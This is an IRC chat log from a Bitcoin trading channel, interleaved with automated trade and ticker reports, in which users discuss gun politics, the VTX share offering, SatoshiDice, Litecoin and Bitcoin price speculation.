no objection with the notions of safety applicable to the us and its citizens, but it's not universal Mar 22 06:49:45 ie, "add guns" is not the universal path to improving safety in absolutely any circumstance, place or time. Mar 22 06:49:46 ex communist countries tend to be none weapon based Mar 22 06:49:51 except for czech republic Mar 22 06:50:16 weapons were banned under communist rule for a reason. Mar 22 06:50:26 lol they always are Mar 22 06:50:31 how were they banned ? everyone got trained to use them whether like it or not Mar 22 06:50:34 men and women. Mar 22 06:50:44 private ownership was banned Mar 22 06:50:50 oh...hmm i thought they get rid of that shit so people don't outright revolt Mar 22 06:50:52 not rly. Mar 22 06:50:57 my father owned a bunch of guns Mar 22 06:51:00 you talking about the slave army everyone had to join Mar 22 06:51:10 mircea_popescu: yeah those are dealbreakers on spain Mar 22 06:51:13 tiberiusiv the us had the draft for a while too you know. Mar 22 06:51:17 i need a usable ocean Mar 22 06:51:22 yes i know Mar 22 06:51:26 [HAVELOCK] [VTX] 100 @ 0.3955 = 39.55 BTC [-] Mar 22 06:51:28 the U.S. has had the draft many times Mar 22 06:51:35 incidentally, im all for the slave army. Mar 22 06:51:42 it'd do a world of good to eu and us youth right now, Mar 22 06:51:48 being forced to push rocks for a year Mar 22 06:51:51 and beaten weekly. Mar 22 06:52:20 militia is the best Mar 22 06:52:25 switzerland and original US Mar 22 06:52:37 [HAVELOCK] [VTX] 25 @ 0.3955 = 9.8875 BTC [-] Mar 22 06:52:46 isnt it odd how the wealthiest state in the EU is also the most pro gun? Mar 22 06:52:48 [HAVELOCK] [VTX] 16 @ 0.3955 = 6.328 BTC [-] Mar 22 06:52:59 and the poorest the most anti? Mar 22 06:53:08 it's only the wealthiest state cause it had enough sense to not join the euro Mar 22 06:53:12 i kinda like the idea of the militia too, but it turns out that they never fought very well in the revolution until Cowpens Mar 22 06:53:16 [HAVELOCK] [VTX] 2 @ 0.3955 = 0.791 BTC [-] Mar 22 06:53:18 and britain ain't the poorest. Mar 22 06:53:29 [HAVELOCK] [VTX] 6 @ 0.3955 = 2.373 BTC [-] Mar 22 06:53:34 they were backed up against the river, and seen enough battles to finally face the brits head on Mar 22 06:53:37 ... Mar 22 06:54:05 a highly armed population is ideal Mar 22 06:54:15 [HAVELOCK] [VTX] 2 @ 0.3955 = 0.791 BTC [-] Mar 22 06:54:16 http://en.wikipedia.org/wiki/Battle_of_Cowpens Mar 22 06:54:26 it depends on the culture tiberiusiv Mar 22 06:54:45 agreed Mar 22 06:54:56 [HAVELOCK] [VTX] 200 @ 0.3955 = 79.1 BTC [-] Mar 22 06:55:52 wow, VTX is selling like crazy Mar 22 06:55:54 509 units remaining Mar 22 06:56:11 a Mar 22 06:56:14 trying to get my btc transffered in time Mar 22 06:56:35 [HAVELOCK] [VTX] 3 @ 0.3955 = 1.1865 BTC [-] Mar 22 06:56:35 vtx is fast fast withdraws Mar 22 06:56:40 so its gonna be cavirtex vs coinlab? Mar 22 06:56:53 cavirtex is for canadians Mar 22 06:57:06 they dont really have none canadian cashout options do they? Mar 22 06:57:07 well it says coinlab's gonna deal with canadians too Mar 22 06:57:30 cavritex has a bank draft to your door in 2days, or a direct deposit in under 24hrs up to 30k Mar 22 06:57:34 i doubt mtgox can match that Mar 22 06:57:50 hopefully they managwe to get their banking partnerships in order. Mar 22 06:58:00 5k btc should go a little that way. Mar 22 06:58:06 did mtgox stop talking or is it just me? Mar 22 06:58:19 it was on/off all day Mar 22 06:58:27 thanks Mar 22 06:58:43 mircea: do you honestly believe btc will be 1k? Mar 22 06:58:48 eventually ? sure. Mar 22 06:58:56 [MPEX] [O.BTCUSD.C450T] 1000 @ 0.35664457 = 356.6446 BTC [+] Mar 22 06:58:58 [MPEX] [O.BTCUSD.C430T] 1000 @ 0.38537148 = 385.3715 BTC [+] Mar 22 06:58:59 [MPEX] [O.BTCUSD.C410T] 1000 @ 0.41409839 = 414.0984 BTC [+] Mar 22 06:59:42 it should be much more than 1k, actually Mar 22 06:59:44 can you send transfers out of bitcoin wallet while your blockchain isnt fully updated Mar 22 06:59:54 prolly they won't go. Mar 22 07:00:14 if it reaches high enough price, trading btc for fiat will be a seen as a shit move Mar 22 07:01:50 [HAVELOCK] [VTX] 5 @ 0.3922 = 1.961 BTC [-] Mar 22 07:02:07 [HAVELOCK] [VTX] 1 @ 0.3922 BTC [-] Mar 22 07:02:15 [HAVELOCK] [VTX] 2 @ 0.3922 = 0.7844 BTC [-] Mar 22 07:02:20 [HAVELOCK] [VTX] 13 @ 0.3922 = 5.0986 BTC [-] Mar 22 07:04:12 [HAVELOCK] [VTX] 25 @ 0.3922 = 9.805 BTC [-] Mar 22 07:04:23 [HAVELOCK] [VTX] 200 @ 0.3922 = 78.44 BTC [-] Mar 22 07:05:01 [HAVELOCK] [VTX] 10 @ 0.3922 = 3.922 BTC [-] Mar 22 07:05:10 [HAVELOCK] [VTX] 5 @ 0.3922 = 1.961 BTC [-] Mar 22 07:05:16 [HAVELOCK] [VTX] 200 @ 0.3922 = 78.44 BTC [-] Mar 22 07:05:33 45 units remaining Mar 22 07:05:44 I'm impressed they got the ipo sold that fast Mar 22 07:05:53 anyone bought VTX? Mar 22 07:05:53 [HAVELOCK] [VTX] 1 @ 0.3922 BTC [-] Mar 22 07:06:01 [HAVELOCK] [VTX] 20 @ 0.3922 = 7.844 BTC [-] Mar 22 07:06:19 [HAVELOCK] [VTX] 1 @ 0.3922 BTC [-] Mar 22 07:06:24 [HAVELOCK] [VTX] 2 @ 0.3922 = 0.7844 BTC [-] Mar 22 07:06:26 [HAVELOCK] [VTX] 5 @ 0.3922 = 1.961 BTC [-] Mar 22 07:06:54 [HAVELOCK] [VTX] 1 @ 0.3922 BTC [-] Mar 22 07:06:55 damn i missed it then Mar 22 07:07:09 Yeah, I did. I'm canadian. I happen to be a regular user. Mar 22 07:07:22 will it trade at havelock Mar 22 07:07:25 as a fund? Mar 22 07:07:27 [HAVELOCK] [VTX] 1 @ 0.3922 BTC [-] Mar 22 07:07:52 i watched the video, they will offer 12% per year on their bitcoin short fund Mar 22 07:07:53 [HAVELOCK] [VTX] 1 @ 0.3922 BTC [-] Mar 22 07:08:04 I guess so. Mar 22 07:08:06 probably will trade yeah Mar 22 07:08:11 no i meant the VTX shares Mar 22 07:08:15 !ticker havelock vtx Mar 22 07:08:16 yeap Mar 22 07:08:18 [HAVELOCK:VTX] 1D: 0.38280000 / 0.39364479 / 0.43320000 (9867 shares, 3884.09310000 BTC), 7D: 0.38280000 / 0.39427952 / 0.46140000 (9991 shares, 3939.24670000 BTC), 30D: 0.38280000 / 0.39427952 / 0.46140000 (9991 shares, 3939.24670000 BTC) Mar 22 07:08:26 im sure some people will want to flip the shares Mar 22 07:08:27 pretty well done. Mar 22 07:08:40 300k in capital in a day Mar 22 07:08:42 wow Mar 22 07:08:44 [HAVELOCK] [VTX] 13 @ 0.3922 = 5.0986 BTC [-] Mar 22 07:09:04 havelock ipos have always done extremely well Mar 22 07:09:17 Yeah Mar 22 07:09:20 the mining fund when it first got out was 4.6 something btcs Mar 22 07:09:29 traded to 20 bucks on today;'s prices Mar 22 07:09:45 they pre ordered with bfl, unfortunately Mar 22 07:09:46 lol Mar 22 07:09:50 ouch. Mar 22 07:10:04 [HAVELOCK] [HIM] 7 @ 1.99 = 13.93 BTC [+] Mar 22 07:10:18 ahh, it's so wunderbar to see how far bicoin finance has come since march 2012 Mar 22 07:10:24 maybe we'll survive overall. Mar 22 07:10:32 doubtful Mar 22 07:10:51 so mp, whats your take on ianbakewell Mar 22 07:10:55 i thought he was legit Mar 22 07:11:01 Bowjob: HIM was trading at 4 BTC you say? Mar 22 07:11:08 yeah in the beginning Mar 22 07:11:13 before the split Mar 22 07:11:18 i'm not convinced intelligence or quality thereof increases witht the number of participants Mar 22 07:11:20 it was 4.6 something back in june Mar 22 07:11:34 So it's now trading at 20 Mar 22 07:11:35 and no one bought it Mar 22 07:11:37 yeah Mar 22 07:11:53 20 BTC Mar 22 07:12:01 Bowjob i thought he was legit too. Mar 22 07:12:13 the idea of shorting whatever the hell tho.... Mar 22 07:12:27 people figure themselves qualified to do things they're not just because. Mar 22 07:12:27 I want to short HIM Mar 22 07:12:40 it ends in tears usually, but they don't learn cause there's an endless reservoir of new ones. Mar 22 07:13:06 his face, name, everything is online Mar 22 07:13:30 i was actually considering lending him 100, but then i decided not to in the end Mar 22 07:14:12 so its 3 payment dates that he missed Mar 22 07:14:14 [MPEX] [O.BTCUSD.C430T] 1000 @ 0.38783812 = 387.8381 BTC [+] Mar 22 07:14:16 [MPEX] [O.BTCUSD.C450T] 1000 @ 0.35922594 = 359.2259 BTC [+] Mar 22 07:14:23 safe to say he ran away Mar 22 07:15:05 [HAVELOCK] [VTX] 1 @ 0.44888888 BTC [+] Mar 22 07:15:05 [HAVELOCK] [VTX] 19 @ 0.44979998 = 8.5462 BTC [+] Mar 22 07:16:00 Wow, people are starting to flip VTX now Mar 22 07:16:03 [HAVELOCK] [VTX] 1 @ 0.44979998 BTC [+] Mar 22 07:16:04 [HAVELOCK] [VTX] 1 @ 0.44979998 BTC [+] Mar 22 07:16:06 [HAVELOCK] [VTX] 1 @ 0.44979998 BTC [+] Mar 22 07:17:04 [HAVELOCK] [VTX] 7 @ 0.44979998 = 3.1486 BTC [+] Mar 22 07:17:25 LTC down to 0.005, same old gutter Mar 22 07:17:29 aww Mar 22 07:18:03 [HAVELOCK] [VTX] 1 @ 0.44888888 BTC [-] Mar 22 07:18:49 I briefly rode the LTC train Mar 22 07:19:04 [HAVELOCK] [SDICE] 1 @ 0.45 BTC [-] Mar 22 07:19:09 then dumped when before it went crashing Mar 22 07:20:37 neat Mar 22 07:21:32 whats neat Mar 22 07:21:40 [MPEX] [O.BTCUSD.C430T] 4 @ 0.38792585 = 1.5517 BTC [+] Mar 22 07:21:42 [MPEX] [O.BTCUSD.C450T] 883 @ 0.35931775 = 317.2776 BTC [+] Mar 22 07:21:50 im guessing goat rode it all the way lol Mar 22 07:21:54 that he rode LTC before the crash Mar 22 07:22:07 He's probably sleeping with all his BTC Mar 22 07:22:08 goat is rich now? Mar 22 07:22:10 LTC* Mar 22 07:22:19 idk but he has money Mar 22 07:22:28 wait, he rode it the whole way down dr strangelove style? Mar 22 07:22:44 goat took some prifits Mar 22 07:22:49 *profits Mar 22 07:22:55 or did he ride it and then jump out of the car before it went over the cliff, hanging on by a tree root Mar 22 07:22:57 but rode the rest down Mar 22 07:23:06 Bowjob: damn Mar 22 07:23:10 the trick is to know when to get out Mar 22 07:23:17 I bought ont he way up, I jumped just in time Mar 22 07:23:18 yah Mar 22 07:23:38 like those btc I sold because I needed to? Mar 22 07:23:40 the trollbox are now consoling each other Mar 22 07:23:42 I wish ihaddent Mar 22 07:24:04 [HAVELOCK] [SDICE] 1 @ 0.45000001 BTC [+] Mar 22 07:24:37 i've only sold about 20 btc in 3 months Mar 22 07:24:50 I sold some at $3x Mar 22 07:25:04 [HAVELOCK] [SDICE] 8 @ 0.45 = 3.6 BTC [-] Mar 22 07:25:26 "jubalix: BTC will fall, and the herd will mass in to cheap LTC" Mar 22 07:25:29 i've moved 5x out of my wallets into cold cold cold storage Mar 22 07:25:32 Oh, trollbox. I love you Mar 22 07:33:15 [BTCTC] [BTC-BOND] 32 @ 0.009899 = 0.3168 BTC [-] Mar 22 07:36:03 [HAVELOCK] [SDICE] 5 @ 0.45 = 2.25 BTC [-] Mar 22 07:36:05 [HAVELOCK] [SDICE] 1 @ 0.45 BTC [-] Mar 22 07:45:47 anybody lending BTCs to fiat users deserves losses Mar 22 07:47:10 [MPEX] [O.BTCUSD.C370T] 1000 @ 0.47382561 = 473.8256 BTC [+] Mar 22 07:48:03 [HAVELOCK] [SDICE] 40 @ 0.45 = 18 BTC [-] Mar 22 07:48:56 [BTCTC] [ASICMINER-PT] 1 @ 0.841 BTC [-] Mar 22 07:48:58 [BTCTC] [ASICMINER-PT] 1 @ 0.841 BTC [-] Mar 22 07:49:04 [HAVELOCK] [SDICE] 39 @ 0.45 = 17.55 BTC [-] Mar 22 07:49:05 [HAVELOCK] [SDICE] 1 @ 0.44000002 BTC [-] Mar 22 07:49:16 [BTCTC] [ASICMINER-PT] 2 @ 0.84 = 1.68 BTC [-] Mar 22 07:53:14 [BTCTC] [ASICMINER-PT] 1 @ 0.8349 BTC [-] Mar 22 07:53:29 [BTCTC] [ASICMINER-PT] 12 @ 0.8346 = 10.0152 BTC [-] Mar 22 07:53:50 [BTCTC] [ASICMINER-PT] 2 @ 0.8345 = 1.669 BTC [-] Mar 22 07:55:30 !ticker m s.dice Mar 22 07:55:31 [MPEX:S.DICE] 1D: 0.00320003 / 0.00433909 / 0.00559697 (56642 shares, 245.78 BTC), 7D: 0.00320003 / 0.00449755 / 0.0058822 (343788 shares, 1,546.21 BTC), 30D: 0.00300001 / 0.00587057 / 0.00673999 (2388432 shares, 14,021.48 BTC) Mar 22 07:56:35 [BTCTC] [ASICMINER-PT] 1 @ 0.8312 BTC [-] Mar 22 07:56:49 [BTCTC] [ASICMINER-PT] 2 @ 0.831001 = 1.662 BTC [-] Mar 22 07:57:08 [BTCTC] [BITVPS] 20 @ 0.004 = 0.08 BTC [+] Mar 22 08:08:08 [MPEX] [O.BTCUSD.C370T] 1000 @ 0.47420263 = 474.2026 BTC [+] Mar 22 08:11:03 heh. no confidence in btc anymore! Mar 22 08:11:04 [BTCTC] [S.DICE-PT] 65 @ 0.00486 = 0.3159 BTC [+] Mar 22 08:11:07 ;;ticker Mar 22 08:11:09 BTCUSD ticker | Best bid: 71.59000, Best ask: 71.78495, Bid-ask spread: 0.19495, Last trade: 72.00001, 24 hour volume: 92534.71730364, 24 hour low: 64.20000, 24 hour high: 74.90000, 24 hour vwap: 70.40441 Mar 22 08:12:28 please bugpowder don't do that Mar 22 08:16:04 [HAVELOCK] [VTX] 1 @ 0.4498 BTC [+] Mar 22 08:17:04 [HAVELOCK] [VTX] 12 @ 0.45 = 5.4 BTC [+] Mar 22 08:17:08 ;;ticker Mar 22 08:17:09 BTCUSD ticker | Best bid: 71.59000, Best ask: 72.00000, Bid-ask spread: 0.41000, Last trade: 72.23273, 24 hour volume: 92504.93940713, 24 hour low: 64.20000, 24 hour high: 74.90000, 24 hour vwap: 70.41054 Mar 22 08:17:11 [BTCTC] [S.DICE-PT] 2 @ 0.00486 = 0.0097 BTC [+] Mar 22 08:20:32 [BTCTC] [CRYPTO-TRADE] 3 @ 0.1821 = 0.5463 BTC [-] Mar 22 08:22:05 [MPEX] [O.BTCUSD.C470T] 2 @ 0.33147579 = 0.663 BTC [+] Mar 22 08:23:00 [MPEX] [O.BTCUSD.C370T] 94 @ 0.47435328 = 44.5892 BTC [+] Mar 22 08:24:06 WHAT? Mar 22 08:24:37 My C490s and C510s are more than making up for the S.DICE disaster Mar 22 08:24:44 [BTCTC] [ASICMINER-PT] 1 @ 0.87 BTC [+] Mar 22 08:24:46 [BTCTC] [ASICMINER-PT] 3 @ 0.872 = 2.616 BTC [+] Mar 22 08:25:02 eh.. disaster? Mar 22 08:25:06 did you go back to dice? Mar 22 08:25:11 its very good news if cavirtex gets a short fund going Mar 22 08:25:11 what disater was tht ? Mar 22 08:25:19 I jumped ship at 0.0075 Mar 22 08:25:47 Bullshit Bowjob Mar 22 08:26:07 i got out of it in time, no bs Mar 22 08:26:45 If this wall gets eaten... Total bear capitulation. Mar 22 08:26:45 http://bitcoincharts.com/charts/mtgoxUSD/accumulated_orderbook.png Mar 22 08:27:03 ive already seen that s.dice will drop in price in the future, months ago Mar 22 08:27:04 https://bitcointalk.org/index.php?topic=135760.0 Mar 22 08:27:06 dice is a great asset to own Mar 22 08:27:56 [BTCTC] [BTC-GOLD] 3 @ 0.00125 = 0.0038 BTC [-] Mar 22 08:28:05 why tiberiusiv? Mar 22 08:28:27 Because most BTC transactions are gambling on SatoshiDice? Mar 22 08:28:30 pays out a great income? Mar 22 08:28:35 That too Mar 22 08:28:40 is addicting? Mar 22 08:28:46 has almost no operating costs Mar 22 08:29:55 Bowjob : "Shares are 0.00475 BTC" Mar 22 08:30:00 guess wghat ? they're the same ? Mar 22 08:30:08 I bought Bowjob's shares, so I'm hurting - not sure s.dice can ever do well with a rising btc price. and of cource btc always rises Mar 22 08:30:41 werent they 0.0032 Mar 22 08:32:00 [BTCTC] [S.MPOE-PT] 4 @ 0.00072 = 0.0029 BTC [-] Mar 22 08:32:24 s.dice does amazing with a rising btc price Mar 22 08:32:29 what are you talking about? Mar 22 08:32:38 ;;ticker Mar 22 08:32:39 BTCUSD ticker | Best bid: 70.04001, Best ask: 70.05000, Bid-ask spread: 0.00999, Last trade: 70.05000, 24 hour volume: 93057.48947432, 24 hour low: 64.20000, 24 hour high: 74.90000, 24 hour vwap: 70.41710 Mar 22 08:32:43 I'm with tiberius on that one Mar 22 08:32:46 theyve doubled from their ipo and thats with bitcoin rising like 600% Mar 22 08:33:07 It only seems like it's lowering because a temporary bigshot or two were doing massive gambling Mar 22 08:33:27 no it seems someone was slowing the site down Mar 22 08:33:32 But big gamblers could be back anytime Mar 22 08:33:32 because transactions per day decreased alot Mar 22 08:33:40 thats why the price came down Mar 22 08:34:15 http://blockchain.info/charts/n-transactions Mar 22 08:34:20 see that decrease? Mar 22 08:34:26 that was sdice being ddosed or some shit Mar 22 08:34:32 you are aware the network was fucked in the mouth for about a week Mar 22 08:34:43 with a bunch of tx pending and a 5 hour long orphan Mar 22 08:34:54 [MPEX] [O.BTCUSD.C490T] 1 @ 0.303 BTC [+] Mar 22 08:35:11 sdice is one of the best assets to own Mar 22 08:35:13 [MPEX] [O.BTCUSD.C510T] 1 @ 0.27442858 BTC [+] Mar 22 08:35:31 it runs on autopilot lol Mar 22 08:35:54 they;'ve lost two < 1s this month Mar 22 08:36:04 but really i'd say it's more an investment than a loss Mar 22 08:36:20 [MPEX] [O.BTCUSD.C450T] 1 @ 0.36014286 BTC [+] Mar 22 08:36:26 those players will give that right back Mar 22 08:36:28 + more Mar 22 08:36:51 they already are Mar 22 08:36:57 sdice justneeds good volume Mar 22 08:36:57 it's a formidable show of strength in any case. Mar 22 08:37:07 there are not that many bitcoin businesses paying out in the k's range. Mar 22 08:37:36 customer growth potential is massive with sdice Mar 22 08:37:57 tons of gambling fiens that dont want to leave the comfort of their homes Mar 22 08:38:01 tiber, what price did u buy dice at Mar 22 08:39:04 Wait. The lost 2 <1 TONIGHT?!? Mar 22 08:39:11 3000 BTC down the tubes? Mar 22 08:39:21 tiber Mar 22 08:39:27 FFS Mar 22 08:39:29 Bugpowder 1 tonight, 2k btc Mar 22 08:39:34 1 earlier this month iirc Mar 22 08:39:35 no ? Mar 22 08:39:49 no Mar 22 08:39:53 2 tonight Mar 22 08:40:08 what srsly ?! Mar 22 08:40:12 O; Mar 22 08:40:48 BTCUSD collapsing Mar 22 08:40:53 SDICE FUCKED Mar 22 08:41:00 everything is going to shit Mar 22 08:41:22 well you sold out and got your tesla rigjht ? Mar 22 08:41:55 ;;ticker Mar 22 08:42:00 BTCUSD ticker | Best bid: 69.11110, Best ask: 69.88000, Bid-ask spread: 0.76890, Last trade: 69.11110, 24 hour volume: 95198.29487360, 24 hour low: 64.20000, 24 hour high: 74.90000, 24 hour vwap: 70.40615 Mar 22 08:42:01 wtf is going on Mar 22 08:42:06 btc is going right back into the low 50's Mar 22 08:42:18 Price ain't collapsing... Mar 22 08:42:24 !ticker m ^oix Mar 22 08:42:25 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 51.19305144 / 62.54448241 / 63.8704312 (21265 shares, 3,903.05 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Mar 22 08:42:33 tiberiusiv stop dreaming Mar 22 08:42:39 http://www.bitcoincharts.com/markets/mtgoxUSD.html Mar 22 08:42:42 oix sez 62 if you believe that. Mar 22 08:42:56 4300 on queue for mtgox account confirmation... Mar 22 08:42:57 error4733: 20k coins sold takes the price to mid 50's Mar 22 08:43:01 I could pop the price back to 72 with like 100 bucks Mar 22 08:43:11 tiber.. you seem to prop up dice a lot Mar 22 08:43:14 when did you buy dice? Mar 22 08:43:18 at what pric Mar 22 08:43:30 what you care Mar 22 08:43:38 why pp would sold 20K ? Mar 22 08:43:43 all light is green Mar 22 08:43:45 because if you bought it at 0.0075, you're just prep talking Mar 22 08:43:45 i dont own alot as i dont like the 30mil market cap Mar 22 08:44:04 i didnt buy it that high Mar 22 08:44:14 get real. i buy and sell depending on what i see ahead Mar 22 08:44:20 every BTC under 100$ is cheap Mar 22 08:44:22 !! Mar 22 08:44:35 iv'e done really well so far. so you're at a loss right now. Mar 22 08:44:39 bowjob im not on losses Mar 22 08:44:49 https://bitcointalk.org/index.php?topic=147613.msg1656294#msg1656294 Mar 22 08:44:51 this shit's too funny Mar 22 08:45:08 we are on road for 500$ in no time Mar 22 08:45:41 5b market cap is still nothing in world economy Mar 22 08:46:04 5b market cap with how shitty liquidity is? Mar 22 08:46:07 doubt it Mar 22 08:46:09 [BTCTC] [ASICMINER-PT] 1 @ 0.835 BTC [-] Mar 22 08:46:24 $2-3mil moves bitcoin 30% Mar 22 08:46:28 error4733 there's some moats to pass before 1bn. Mar 22 08:46:29 [BTCTC] [ASICMINER-PT] 1 @ 0.8321 BTC [-] Mar 22 08:46:50 1b ? Mar 22 08:46:53 yes Mar 22 08:46:59 250m more haha Mar 22 08:47:11 15 days ? Mar 22 08:48:00 id at least wait till the cypriots open their banks Mar 22 08:48:04 [HAVELOCK] [VTX] 1 @ 0.45 BTC [+] Mar 22 08:48:46 dude I am selling coins all the way up Mar 22 08:50:04 [HAVELOCK] [VTX] 6 @ 0.45 = 2.7 BTC [+] Mar 22 08:51:24 [BTCTC] [BTC-TRADING-PT] 1 @ 0.15 BTC [-] Mar 22 08:51:26 [BTCTC] [BTC-TRADING-PT] 3 @ 0.143 = 0.429 BTC [-] Mar 22 08:51:29 [BTCTC] [BTC-TRADING-PT] 1 @ 0.142 BTC [-] Mar 22 08:51:30 [BTCTC] [BTC-TRADING-PT] 3 @ 0.1415 = 0.4245 BTC [-] Mar 22 08:53:04 [HAVELOCK] [VTX] 22 @ 0.49899 = 10.9778 BTC [+] Mar 22 09:00:49 bitcoin is going to collapse when risk assets turn south again Mar 22 09:00:51 just like in 2011 Mar 22 09:01:14 this is possible. Mar 22 09:01:19 bitcoin rallies with the US stock market Mar 22 09:01:23 and declines with it as well Mar 22 09:01:29 just with multiples up and down Mar 22 09:04:09 fortunes were made thinking one knows how bitcoin moves, Mar 22 09:04:13 fortunes were lost thinking one knows how bitcoin moves. Mar 22 09:04:18 fact is nobody has a clue. Mar 22 09:04:29 its all herd psycology Mar 22 09:04:35 everyone called bitcoin dead at $2 Mar 22 09:04:39 but wants it like crazy at 70 Mar 22 09:04:53 nobody bought US stocks until january 2013 Mar 22 09:04:57 ;;ticker Mar 22 09:04:58 BTCUSD ticker | Best bid: 69.72001, Best ask: 70.04988, Bid-ask spread: 0.32987, Last trade: 69.72001, 24 hour volume: 96320.27532477, 24 hour low: 64.99240, 24 hour high: 74.90000, 24 hour vwap: 70.40547 Mar 22 09:05:02 4 years after a bull run Mar 22 09:05:04 [HAVELOCK] [VTX] 1 @ 0.49898999 BTC [-] Mar 22 09:05:05 its friday.. so weekend dip Mar 22 09:05:06 started Mar 22 09:06:53 pull up a chart of the US stock market Mar 22 09:06:57 and look at 2011 Mar 22 09:07:01 peaked out same time BTC did Mar 22 09:07:46 you have to stop looking 2 months or 3 Mar 22 09:08:30 [MPEX] [O.BTCUSD.P750T] 1000 @ 0.16052553 = 160.5255 BTC [-] Mar 22 09:08:37 ok you call a correction, but in long term, under 100$ is a cheap price Mar 22 09:08:54 well on the long term sure. Mar 22 09:08:58 how so? Mar 22 09:09:22 liqudity hasnt improved, and current bitcoin market cap can support an economy that generates 8 billion a year in goods and services Mar 22 09:09:37 after, if you feel lucky and want start trade, learn in one week what traders learn in one life, take your shoot Mar 22 09:09:58 error4733 you just angry that you bought high Mar 22 09:10:06 ? Mar 22 09:10:10 the US stock market peaked out 1 month before BTC did in 2011 Mar 22 09:10:12 a jump in a 13$ Mar 22 09:10:33 theres plenty of indications of a short term multi month top Mar 22 09:10:41 some guy is offering his house for BTC Mar 22 09:11:08 [MPEX] [O.BTCUSD.C470T] 1000 @ 0.33195374 = 331.9537 BTC [+] Mar 22 09:11:32 well, the options are clearly calling this a top Mar 22 09:11:41 so maybe it's the top for this week. Mar 22 09:12:02 gox wont take in new money, for the next 2 days Mar 22 09:12:05 bitcoinis ripe for a 50% collapse to the weekly moving average Mar 22 09:12:53 not to mention the gross overvaluation of bitcoin business's Mar 22 09:13:18 cavirtex raised 300k with almost 0 advertising trading at 8x sales Mar 22 09:14:04 [HAVELOCK] [SDICE] 5 @ 0.4679975 = 2.34 BTC [+] Mar 22 09:14:14 bitcoin will probably force a re-modelling of valuation models. Mar 22 09:14:24 because of its deflationary nature any revenue stream is worth a lot. Mar 22 09:14:39 tiberius + for cavirtex Mar 22 09:14:54 +1MP Mar 22 09:15:10 mircea: the US was on a deflationary currency for 100 years Mar 22 09:15:37 when ? Mar 22 09:15:46 during its china moment Mar 22 09:15:51 in the 1800's Mar 22 09:15:57 prices fell the entire century Mar 22 09:16:02 on the gold standard Mar 22 09:16:27 when the most prosperous middle class in world history emerged and that was with a civil war as well Mar 22 09:18:07 prices were 50% lower in 1900 then in 1800 Mar 22 09:18:10 this is true Mar 22 09:18:19 and at that time any revenue stream was worth dieingfor Mar 22 09:18:21 and peopledid. Mar 22 09:18:40 GDP grew at over 4% annually Mar 22 09:18:54 those numbers would never be reached by the US again Mar 22 09:20:06 anyway, an argument can be brought that bitcoin businesses are sorely undervalued atm, in the sense that if you add the half dozen which are serious they're not even 1/4 monetarty mass Mar 22 09:20:07 US went from a 3rd world to 2x wealthier then europe in 100 years Mar 22 09:20:09 that's nonsense. Mar 22 09:20:23 they arent undervalued Mar 22 09:20:50 first off you have no shareholder rights Mar 22 09:20:59 that's an advantage Mar 22 09:21:01 not a drawback. Mar 22 09:21:05 0 verification of anything Mar 22 09:21:12 no dispute settlement Mar 22 09:21:44 no voting -> you don't need to expend time to inform yourself and vote. no dispute settlement -> you can't waste capital on lawyer fees. Mar 22 09:22:07 That's good only if there's never an issue arising Mar 22 09:22:10 you have no verification of incomes or expenses posted Mar 22 09:22:15 [MPEX] [O.BTCUSD.C470T] 1000 @ 0.33195374 = 331.9537 BTC [+] Mar 22 09:22:17 that's not really true. Mar 22 09:22:19 [MPEX] [O.BTCUSD.P750T] 1000 @ 0.16040513 = 160.4051 BTC [-] Mar 22 09:22:31 s.dice yo ucan verify. asicminer you can (sorta) verify. mpoe you can verify Mar 22 09:22:38 bitbet you can certainly verify Mar 22 09:23:16 Namworld it's just a theory in my head, but i suspect that macro speaking, the total fees taken by lawyers in a year = the total value of resolutions. Mar 22 09:23:16 True, some have public BTC addresses. Checking what they earn is trivial. Mar 22 09:23:24 so basically you're not making a profit in that paradigm, globally. Mar 22 09:23:36 As for verifications... well pretty much any documents can be forged. Mar 22 09:23:47 Other than BTC transactions Mar 22 09:24:09 if bitcoin collapses by more then 50% Mar 22 09:24:18 it will take years if not a decade Mar 22 09:24:19 to regain Mar 22 09:24:53 just like the last high took 2 years to surpass Mar 22 09:25:11 [MPEX] [O.BTCUSD.C550T] 1000 @ 0.2177331 = 217.7331 BTC [+] Mar 22 09:25:13 [MPEX] [O.BTCUSD.C530T] 1000 @ 0.24628826 = 246.2883 BTC [+] Mar 22 09:25:18 [MPEX] [O.BTCUSD.C510T] 1000 @ 0.27484342 = 274.8434 BTC [+] Mar 22 09:25:20 [MPEX] [O.BTCUSD.C490T] 1000 @ 0.30339858 = 303.3986 BTC [+] Mar 22 09:25:30 maybe. Mar 22 09:25:36 there'd be nothing wrong with that incidentally. Mar 22 09:25:38 wrong Mar 22 09:25:47 i don't subscribe to this rushed approach many take. Mar 22 09:25:54 if it goes down by 50% someone will buy it Mar 22 09:25:59 let it be two years, let the scammers suddenly flooding the forum get despondent, no loss here. Mar 22 09:26:11 !ticker Mar 22 09:26:12 Things which are alike, in nature, grow to look alike, and the speaking stones have lain a long time lookin' at the sun. Mar 22 09:26:47 mkay so this morning is > 35k contracts traded with the bot Mar 22 09:26:51 this is one of those days. Mar 22 09:26:56 assbot stfu, you're bot. you have the right to only speak about tickers and trades Mar 22 09:27:41 someone rly fix the bot, it's not fun to see that kind of crap. instead, it should tell instructions Mar 22 09:28:04 what are you trying to do ? Mar 22 09:28:12 it's a bot. Mar 22 09:28:15 i'm not. Mar 22 09:28:47 "Indonesia may outlaw unmarried sex with jail threatened for offenders" Mar 22 09:31:07 indonesia is scary Mar 22 09:31:16 i hear they cut off your head if you get caught fapping Mar 22 09:31:24 which head, i wonder Mar 22 09:32:02 yes "maybe" Mar 22 09:43:34 [MPEX] [O.BTCUSD.C470T] 1000 @ 0.33195374 = 331.9537 BTC [+] Mar 22 09:43:44 [BTCTC] [S.DICE-PT] 292 @ 0.00486 = 1.4191 BTC [+] Mar 22 09:44:04 [HAVELOCK] [VTX] 14 @ 0.49898888 = 6.9858 BTC [-] Mar 22 09:44:06 [MPEX] [O.BTCUSD.P750T] 2 @ 0.16017925 = 0.3204 BTC [-] Mar 22 09:44:07 [MPEX] [O.BTCUSD.P750T] 998 @ 0.16028476 = 159.9642 BTC [+] Mar 22 09:44:33 [BTCTC] [S.DICE-PT] 31 @ 0.00487 = 0.151 BTC [+] Mar 22 09:44:35 [BTCTC] [S.DICE-PT] 526 @ 0.00487 = 2.5616 BTC [+] Mar 22 09:50:50 [MPEX] [O.BTCUSD.C470T] 228 @ 0.33195374 = 75.6855 BTC [+] Mar 22 09:51:01 It's about time S.DICE gets some traction Mar 22 09:51:16 (The PT S.DICE) Mar 22 10:02:46 yes 